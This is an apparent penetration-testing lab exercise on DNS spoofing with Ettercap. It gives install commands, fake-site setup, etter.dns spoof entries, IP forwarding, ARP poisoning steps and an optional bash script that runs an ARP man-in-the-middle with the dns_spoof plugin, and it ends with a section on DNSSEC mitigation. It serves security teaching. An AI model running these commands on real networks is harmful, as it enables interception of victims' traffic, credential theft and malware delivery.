Exercise 9: DNS Spoofing with Ettercap

Objective

Simulate a DNS spoofing attack using Ettercap to redirect traffic from a legitimate website to a malicious server and understand how DNSSEC can mitigate such attacks.

Scenario

You are a penetration tester assessing the security of a local network. One of the potential threats in unsecured networks is DNS spoofing, where an attacker redirects users from legitimate websites to malicious ones. In this exercise, you will use Ettercap to perform a DNS spoofing attack in a controlled lab environment and observe how DNSSEC can prevent such attacks.

⚠️ Important: This exercise must only be conducted in a legal and controlled environment. Unauthorized DNS spoofing is illegal and unethical.

Lab Instructions

Step 1: Set Up the Lab Environment

• Attacker Machine: Linux system with Ettercap installed.
• Victim Machine: A device on the same network.
• Malicious Server: A simple web server serving a fake page.

Step 2: Install Ettercap

On the Attacker Machine, install Ettercap:

sudo apt update 
sudo apt install ettercap-graphical -y

Run Ettercap with root privileges:

sudo ettercap -G

Step 3: Configure the Malicious Web Server

On the Attacker Machine, set up a simple fake website:

sudo apt install apache2 -y 
echo "<h1>Fake Example.com</h1>" | sudo tee /var/www/html/index.html 
sudo systemctl start apache2

Step 4: Edit the DNS Spoof Configuration

Open Ettercap’s DNS spoof configuration file:

sudo nano /etc/ettercap/etter.dns

Add the following line to redirect example.com to the attacker’s IP:

example.com A <attacker-ip> 
*.example.com A <attacker-ip>

Replace <attacker-ip> with the IP address of the attacker machine.

Step 5: Launch the DNS Spoofing Attack

Enable IP forwarding:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Start Ettercap in graphical mode:

Go to Sniff > Unified sniffing and select the correct network interface.

Add the victim and the gateway to the target list.

Navigate to Mitm > ARP poisoning and enable it for both directions.

Go to Plugins > Manage the plugins and enable dns_spoof.

Step 6: Test the Redirection

On the Victim Machine, open a browser and visit:

http://example.com

The victim should be redirected to the fake web page hosted on the attacker’s machine.

Solution & Explanation

How DNS Spoofing Works

• The attacker poisons the ARP cache of the victim and the gateway, positioning themselves as a man-in-the-middle.
• DNS requests for example.com are intercepted and spoofed to resolve to the attacker’s IP.
• The victim unknowingly accesses the malicious web server.

Result

• Victim traffic meant for example.com is redirected to a fake page.
• This simulates how attackers can steal credentials or deliver malware.

Mitigation with DNSSEC

What is DNSSEC?

• DNS Security Extensions (DNSSEC) adds cryptographic signatures to DNS data to ensure its authenticity.

How DNSSEC Prevents DNS Spoofing

1. Digital Signatures: DNS records are signed with a private key, and resolvers verify them with the public key.
2. Data Integrity: Unauthorized modifications to DNS data are detectable.
3. Authentication: Prevents redirection to malicious servers by ensuring data comes from a verified source.

Limitations of DNSSEC

• Complexity: Implementation can be complex and resource-intensive.
• Partial Adoption: Not all domains and resolvers support DNSSEC.

Testing & Verification

• Verify the fake site loads when visiting example.com on the victim machine.
• Disable the Ettercap attack and confirm the victim can access the legitimate example.com.
• Analyze ARP tables and DNS responses to understand the redirection.

Additional Script (Optional)

Automate the DNS spoofing setup:

#!/bin/bash
# Enable IP forwarding
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

# Configure DNS spoofing
sudo bash -c 'echo "example.com A $(hostname -I | awk "{print $1}")" >> /etc/ettercap/etter.dns'

# Start Ettercap
sudo ettercap -T -q -i eth0 -M arp:remote /<victim-ip>/ /<gateway-ip>/ -P dns_spoof

Conclusion

In this exercise, you successfully simulated a DNS spoofing attack using Ettercap and redirected traffic to a fake site. You also explored how DNSSEC can prevent such attacks by ensuring the authenticity and integrity of DNS data. Understanding these attack methods and their defenses is crucial for protecting network infrastructure.